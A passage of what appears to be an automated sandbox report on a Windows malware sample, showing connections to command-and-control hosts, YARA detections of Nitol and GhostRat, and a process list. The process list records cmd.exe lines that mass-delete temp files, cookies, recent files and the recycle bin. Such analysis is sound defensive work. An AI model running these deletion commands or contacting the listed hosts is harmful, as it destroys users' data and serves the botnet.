                              Dec 23, 2024 09:13:18.358541012 CET808049723120.48.34.233192.168.2.9
                              Dec 23, 2024 09:13:18.358630896 CET497238080192.168.2.9120.48.34.233
                              Dec 23, 2024 09:13:18.363697052 CET497238080192.168.2.9120.48.34.233
                              Dec 23, 2024 09:13:18.483692884 CET808049723120.48.34.233192.168.2.9
                              Dec 23, 2024 09:13:18.814317942 CET800049717120.48.34.233192.168.2.9
                              Dec 23, 2024 09:13:18.859292030 CET497178000192.168.2.9120.48.34.233
                              Dec 23, 2024 09:13:19.296667099 CET4972480192.168.2.9192.168.2.1
                              Dec 23, 2024 09:13:21.296703100 CET4972480192.168.2.9192.168.2.1
                              Dec 23, 2024 09:13:25.296669960 CET4972480192.168.2.9192.168.2.1
                              Dec 23, 2024 09:13:33.343485117 CET4972480192.168.2.9192.168.2.1
                              Dec 23, 2024 09:13:36.914457083 CET497618090192.168.2.993.46.8.90
                              Dec 23, 2024 09:13:37.034209967 CET80904976193.46.8.90192.168.2.9
                              Dec 23, 2024 09:13:37.036398888 CET497618090192.168.2.993.46.8.90
                              Dec 23, 2024 09:13:37.071522951 CET497618090192.168.2.993.46.8.90
                              Dec 23, 2024 09:13:37.191291094 CET80904976193.46.8.90192.168.2.9
                              Dec 23, 2024 09:13:40.252317905 CET808049723120.48.34.233192.168.2.9
                              Dec 23, 2024 09:13:40.252594948 CET497238080192.168.2.9120.48.34.233
                              Dec 23, 2024 09:13:40.290882111 CET497238080192.168.2.9120.48.34.233
                              Dec 23, 2024 09:13:40.410528898 CET808049723120.48.34.233192.168.2.9
                              Dec 23, 2024 09:13:41.113569021 CET497708080192.168.2.9120.48.34.233
                              Dec 23, 2024 09:13:41.233191013 CET808049770120.48.34.233192.168.2.9
                              Dec 23, 2024 09:13:41.233314037 CET497708080192.168.2.9120.48.34.233
                              Dec 23, 2024 09:13:41.286544085 CET497708080192.168.2.9120.48.34.233
                              Dec 23, 2024 09:13:41.406198978 CET808049770120.48.34.233192.168.2.9
                              Dec 23, 2024 09:13:58.940668106 CET80904976193.46.8.90192.168.2.9
                              Dec 23, 2024 09:13:58.940803051 CET497618090192.168.2.993.46.8.90
                              Dec 23, 2024 09:13:58.943110943 CET497618090192.168.2.993.46.8.90
                              Dec 23, 2024 09:13:59.062654972 CET80904976193.46.8.90192.168.2.9
                              Dec 23, 2024 09:14:03.127638102 CET808049770120.48.34.233192.168.2.9
                              Dec 23, 2024 09:14:03.127774000 CET497708080192.168.2.9120.48.34.233
                              Dec 23, 2024 09:14:03.127866983 CET497708080192.168.2.9120.48.34.233
                              Dec 23, 2024 09:14:03.247419119 CET808049770120.48.34.233192.168.2.9
                              Dec 23, 2024 09:14:03.474334955 CET498168080192.168.2.9120.48.34.233
                              Dec 23, 2024 09:14:03.696297884 CET808049816120.48.34.233192.168.2.9
                              Dec 23, 2024 09:14:03.696459055 CET498168080192.168.2.9120.48.34.233
                              Dec 23, 2024 09:14:03.725639105 CET498168080192.168.2.9120.48.34.233
                              Dec 23, 2024 09:14:03.845202923 CET808049816120.48.34.233192.168.2.9
                              Dec 23, 2024 09:14:17.834741116 CET498418090192.168.2.993.46.8.90
                              Dec 23, 2024 09:14:17.954405069 CET80904984193.46.8.90192.168.2.9
                              Dec 23, 2024 09:14:17.954483032 CET498418090192.168.2.993.46.8.90
                              Dec 23, 2024 09:14:19.283148050 CET498418090192.168.2.993.46.8.90
                              Dec 23, 2024 09:14:19.402726889 CET80904984193.46.8.90192.168.2.9
                              Dec 23, 2024 09:14:25.612293005 CET808049816120.48.34.233192.168.2.9
                              Dec 23, 2024 09:14:25.612380028 CET498168080192.168.2.9120.48.34.233
                              Dec 23, 2024 09:14:25.614432096 CET498168080192.168.2.9120.48.34.233
                              Dec 23, 2024 09:14:25.733956099 CET808049816120.48.34.233192.168.2.9
                              Dec 23, 2024 09:14:26.271347046 CET498638080192.168.2.9120.48.34.233
                              Dec 23, 2024 09:14:26.391119003 CET808049863120.48.34.233192.168.2.9
                              Dec 23, 2024 09:14:26.391207933 CET498638080192.168.2.9120.48.34.233
                              Dec 23, 2024 09:14:26.436543941 CET498638080192.168.2.9120.48.34.233
                              Dec 23, 2024 09:14:26.556097984 CET808049863120.48.34.233192.168.2.9
                              Dec 23, 2024 09:14:39.846821070 CET80904984193.46.8.90192.168.2.9
                              Dec 23, 2024 09:14:39.846935034 CET498418090192.168.2.993.46.8.90
                              Dec 23, 2024 09:14:39.847033024 CET498418090192.168.2.993.46.8.90
                              Dec 23, 2024 09:14:39.967506886 CET80904984193.46.8.90192.168.2.9
                              Dec 23, 2024 09:14:48.300180912 CET808049863120.48.34.233192.168.2.9
                              Dec 23, 2024 09:14:48.300358057 CET498638080192.168.2.9120.48.34.233
                              Dec 23, 2024 09:14:48.300462008 CET498638080192.168.2.9120.48.34.233
                              Dec 23, 2024 09:14:48.420018911 CET808049863120.48.34.233192.168.2.9
                              Dec 23, 2024 09:14:48.747469902 CET499028080192.168.2.9120.48.34.233
                              Dec 23, 2024 09:14:48.867120981 CET808049902120.48.34.233192.168.2.9
                              Dec 23, 2024 09:14:48.867337942 CET499028080192.168.2.9120.48.34.233
                              Dec 23, 2024 09:14:48.925491095 CET499028080192.168.2.9120.48.34.233
                              Dec 23, 2024 09:14:49.045082092 CET808049902120.48.34.233192.168.2.9
                              Dec 23, 2024 09:15:00.989197016 CET499288090192.168.2.993.46.8.90
                              Dec 23, 2024 09:15:01.108808041 CET80904992893.46.8.90192.168.2.9
                              Dec 23, 2024 09:15:01.110486031 CET499288090192.168.2.993.46.8.90
                              Dec 23, 2024 09:15:01.201380014 CET499288090192.168.2.993.46.8.90
                              Dec 23, 2024 09:15:01.321993113 CET80904992893.46.8.90192.168.2.9
                              Dec 23, 2024 09:15:10.785068989 CET808049902120.48.34.233192.168.2.9
                              Dec 23, 2024 09:15:10.787584066 CET499028080192.168.2.9120.48.34.233
                              Dec 23, 2024 09:15:10.787584066 CET499028080192.168.2.9120.48.34.233
                              Dec 23, 2024 09:15:10.907999992 CET808049902120.48.34.233192.168.2.9
                              Dec 23, 2024 09:15:11.449345112 CET499448080192.168.2.9120.48.34.233
                              Dec 23, 2024 09:15:11.568999052 CET808049944120.48.34.233192.168.2.9
                              Dec 23, 2024 09:15:11.569083929 CET499448080192.168.2.9120.48.34.233
                              Dec 23, 2024 09:15:19.384989023 CET499448080192.168.2.9120.48.34.233
                              Dec 23, 2024 09:15:19.504550934 CET808049944120.48.34.233192.168.2.9
                              Dec 23, 2024 09:15:23.004023075 CET80904992893.46.8.90192.168.2.9
                              Dec 23, 2024 09:15:23.004110098 CET499288090192.168.2.993.46.8.90
                              Dec 23, 2024 09:15:23.004196882 CET499288090192.168.2.993.46.8.90
                              Dec 23, 2024 09:15:23.123621941 CET80904992893.46.8.90192.168.2.9
                              Dec 23, 2024 09:15:33.457417965 CET808049944120.48.34.233192.168.2.9
                              Dec 23, 2024 09:15:33.460588932 CET499448080192.168.2.9120.48.34.233
                              Dec 23, 2024 09:15:33.464392900 CET499448080192.168.2.9120.48.34.233
                              Dec 23, 2024 09:15:33.583913088 CET808049944120.48.34.233192.168.2.9
                              Dec 23, 2024 09:15:33.876785040 CET499858080192.168.2.9120.48.34.233
                              Dec 23, 2024 09:15:33.996488094 CET808049985120.48.34.233192.168.2.9
                              Dec 23, 2024 09:15:34.000579119 CET499858080192.168.2.9120.48.34.233
                              Dec 23, 2024 09:15:34.537180901 CET499858080192.168.2.9120.48.34.233
                              Dec 23, 2024 09:15:34.656831980 CET808049985120.48.34.233192.168.2.9
                              Dec 23, 2024 09:15:41.487292051 CET499868090192.168.2.993.46.8.90
                              Dec 23, 2024 09:15:41.606981039 CET80904998693.46.8.90192.168.2.9
                              Dec 23, 2024 09:15:41.607091904 CET499868090192.168.2.993.46.8.90
                              Dec 23, 2024 09:15:41.766782999 CET499868090192.168.2.993.46.8.90
                              Dec 23, 2024 09:15:41.886392117 CET80904998693.46.8.90192.168.2.9
                              Dec 23, 2024 09:15:55.910871983 CET808049985120.48.34.233192.168.2.9
                              Dec 23, 2024 09:15:55.910985947 CET499858080192.168.2.9120.48.34.233
                              Dec 23, 2024 09:15:55.911089897 CET499858080192.168.2.9120.48.34.233
                              Dec 23, 2024 09:15:56.030975103 CET808049985120.48.34.233192.168.2.9
                              Dec 23, 2024 09:15:56.487107038 CET499878080192.168.2.9120.48.34.233
                              Dec 23, 2024 09:15:56.606661081 CET808049987120.48.34.233192.168.2.9
                              Dec 23, 2024 09:15:56.606754065 CET499878080192.168.2.9120.48.34.233
                              Dec 23, 2024 09:15:56.678352118 CET499878080192.168.2.9120.48.34.233
                              Dec 23, 2024 09:15:56.797826052 CET808049987120.48.34.233192.168.2.9
                              Dec 23, 2024 09:16:03.536132097 CET80904998693.46.8.90192.168.2.9
                              Dec 23, 2024 09:16:03.536233902 CET499868090192.168.2.993.46.8.90
                              Dec 23, 2024 09:16:03.536297083 CET499868090192.168.2.993.46.8.90
                              Dec 23, 2024 09:16:03.655797005 CET80904998693.46.8.90192.168.2.9
                              Dec 23, 2024 09:16:18.520591021 CET808049987120.48.34.233192.168.2.9
                              Dec 23, 2024 09:16:18.524401903 CET499878080192.168.2.9120.48.34.233
                              Dec 23, 2024 09:16:18.524401903 CET499878080192.168.2.9120.48.34.233
                              Dec 23, 2024 09:16:18.643969059 CET808049987120.48.34.233192.168.2.9
                              Dec 23, 2024 09:16:18.843770027 CET497178000192.168.2.9120.48.34.233
                              Dec 23, 2024 09:16:18.963367939 CET800049717120.48.34.233192.168.2.9
                              Dec 23, 2024 09:16:19.147248983 CET499888080192.168.2.9120.48.34.233
                              Dec 23, 2024 09:16:19.267069101 CET808049988120.48.34.233192.168.2.9
                              Dec 23, 2024 09:16:19.267189026 CET499888080192.168.2.9120.48.34.233
                              Dec 23, 2024 09:16:19.335819960 CET499888080192.168.2.9120.48.34.233
                              Dec 23, 2024 09:16:19.455451012 CET808049988120.48.34.233192.168.2.9

                              UDP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Dec 23, 2024 09:13:36.493769884 CET5677053192.168.2.91.1.1.1
                              Dec 23, 2024 09:13:36.907227993 CET53567701.1.1.1192.168.2.9
                              Dec 23, 2024 09:13:56.392451048 CET5073553192.168.2.91.1.1.1
                              Dec 23, 2024 09:13:56.529966116 CET53507351.1.1.1192.168.2.9
                              Dec 23, 2024 09:15:00.569003105 CET6243253192.168.2.91.1.1.1
                              Dec 23, 2024 09:15:00.967186928 CET53624321.1.1.1192.168.2.9
                              Dec 23, 2024 09:16:22.204782963 CET5688153192.168.2.91.1.1.1
                              Dec 23, 2024 09:16:22.600442886 CET53568811.1.1.1192.168.2.9

                              ICMP Packets

                              TimestampSource IPDest IPChecksumCodeType
                              Dec 23, 2024 09:13:18.292145014 CET192.168.2.1192.168.2.9827e(Port unreachable)Destination Unreachable
                              Dec 23, 2024 09:13:19.296713114 CET192.168.2.1192.168.2.9827e(Port unreachable)Destination Unreachable
                              Dec 23, 2024 09:13:21.296755075 CET192.168.2.1192.168.2.9827e(Port unreachable)Destination Unreachable
                              Dec 23, 2024 09:13:25.296720982 CET192.168.2.1192.168.2.9827e(Port unreachable)Destination Unreachable
                              Dec 23, 2024 09:13:33.343519926 CET192.168.2.1192.168.2.9827e(Port unreachable)Destination Unreachable

                              DNS Queries

                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                              Dec 23, 2024 09:13:36.493769884 CET192.168.2.91.1.1.10xec39Standard query (0)chinagov.8800.orgA (IP address)IN (0x0001)false
                              Dec 23, 2024 09:13:56.392451048 CET192.168.2.91.1.1.10xb021Standard query (0)chinagov.8800.orgA (IP address)IN (0x0001)false
                              Dec 23, 2024 09:15:00.569003105 CET192.168.2.91.1.1.10x4885Standard query (0)chinagov.8800.orgA (IP address)IN (0x0001)false
                              Dec 23, 2024 09:16:22.204782963 CET192.168.2.91.1.1.10x83abStandard query (0)chinagov.8800.orgA (IP address)IN (0x0001)false

                              DNS Answers

                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                              Dec 23, 2024 09:13:10.305057049 CET1.1.1.1192.168.2.90x6a42No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                              Dec 23, 2024 09:13:10.305057049 CET1.1.1.1192.168.2.90x6a42No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                              Dec 23, 2024 09:13:36.907227993 CET1.1.1.1192.168.2.90xec39No error (0)chinagov.8800.org93.46.8.90A (IP address)IN (0x0001)false
                              Dec 23, 2024 09:13:56.529966116 CET1.1.1.1192.168.2.90xb021No error (0)chinagov.8800.org93.46.8.90A (IP address)IN (0x0001)false
                              Dec 23, 2024 09:15:00.967186928 CET1.1.1.1192.168.2.90x4885No error (0)chinagov.8800.org93.46.8.90A (IP address)IN (0x0001)false
                              Dec 23, 2024 09:16:22.600442886 CET1.1.1.1192.168.2.90x83abNo error (0)chinagov.8800.org46.82.174.69A (IP address)IN (0x0001)false

                              Statistics

                              CPU Usage

                              Click to jump to process

                              Memory Usage

                              Click to jump to process

                              High Level Behavior Distribution

                              Click to dive into process behavior distribution

                              Behavior

                              Click to jump to process

                              System Behavior

                              General

                              Target ID:0
                              Start time:03:13:15
                              Start date:23/12/2024
                              Path:C:\Users\user\Desktop\G3izWAY3Fa.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\G3izWAY3Fa.exe"
                              Imagebase:0x400000
                              File size:963'286 bytes
                              MD5 hash:118F7F61B6AFB1DA5E94EA1740222C73
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:low
                              Has exited:true

                              General

                              Target ID:2
                              Start time:03:13:16
                              Start date:23/12/2024
                              Path:C:\Windows\Temp\v5.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\temp\v5.exe"
                              Imagebase:0x400000
                              File size:16'896 bytes
                              MD5 hash:48A02F4A003E8CBE683CF5DADA237168
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 00000002.00000002.1383419813.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security
                              Antivirus matches:
                              • Detection: 100%, Avira
                              • Detection: 100%, Joe Sandbox ML
                              • Detection: 100%, ReversingLabs
                              Reputation:low
                              Has exited:true

                              General

                              Target ID:3
                              Start time:03:13:16
                              Start date:23/12/2024
                              Path:C:\Windows\Temp\server.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\temp\server.exe"
                              Imagebase:0x400000
                              File size:196'608 bytes
                              MD5 hash:8A953A49796B7F8C7539A6B2BC175397
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000002.3339534621.0000000001FD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: gh0st, Description: unknown, Source: 00000003.00000002.3339534621.0000000001FD0000.00000004.00001000.00020000.00000000.sdmp, Author: https://github.com/jackcr/
                              • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000002.3363429748.0000000002A7D000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: gh0st, Description: unknown, Source: 00000003.00000002.3363429748.0000000002A7D000.00000004.00000010.00020000.00000000.sdmp, Author: https://github.com/jackcr/
                              Antivirus matches:
                              • Detection: 100%, Avira
                              • Detection: 100%, Joe Sandbox ML
                              • Detection: 95%, ReversingLabs
                              Reputation:low
                              Has exited:false

                              General

                              Target ID:4
                              Start time:03:13:16
                              Start date:23/12/2024
                              Path:C:\Windows\Temp\v5.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Windows\temp\v5.exe
                              Imagebase:0x400000
                              File size:16'896 bytes
                              MD5 hash:48A02F4A003E8CBE683CF5DADA237168
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 00000004.00000002.3258916401.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security
                              Reputation:low
                              Has exited:false

                              General

                              Target ID:5
                              Start time:03:13:16
                              Start date:23/12/2024
                              Path:C:\Windows\Temp\ .exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\temp\ .exe"
                              Imagebase:0x400000
                              File size:1'429'612 bytes
                              MD5 hash:CCEE0912E79D434F0D2C1E11274F23C0
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Antivirus matches:
                              • Detection: 4%, ReversingLabs
                              Reputation:low
                              Has exited:false

                              General

                              Target ID:6
                              Start time:03:13:16
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\system32\cmd.exe" /c del C:\Windows\temp\v5.exe > nul
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:7
                              Start time:03:13:16
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:8
                              Start time:03:13:26
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:9
                              Start time:03:13:26
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:10
                              Start time:03:13:26
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:11
                              Start time:03:13:26
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:12
                              Start time:03:13:26
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:13
                              Start time:03:13:26
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:14
                              Start time:03:13:26
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:15
                              Start time:03:13:26
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:16
                              Start time:03:13:26
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\*.* & exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:17
                              Start time:03:13:26
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:18
                              Start time:03:13:26
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:20
                              Start time:03:13:27
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:21
                              Start time:03:13:29
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:22
                              Start time:03:13:29
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:24
                              Start time:03:13:30
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal*.* & exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:25
                              Start time:03:13:30
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:26
                              Start time:03:14:05
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:27
                              Start time:03:14:05
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:28
                              Start time:03:14:05
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:29
                              Start time:03:14:05
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:30
                              Start time:03:14:05
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:31
                              Start time:03:14:05
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:32
                              Start time:03:14:05
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:33
                              Start time:03:14:05
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\*.* & exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
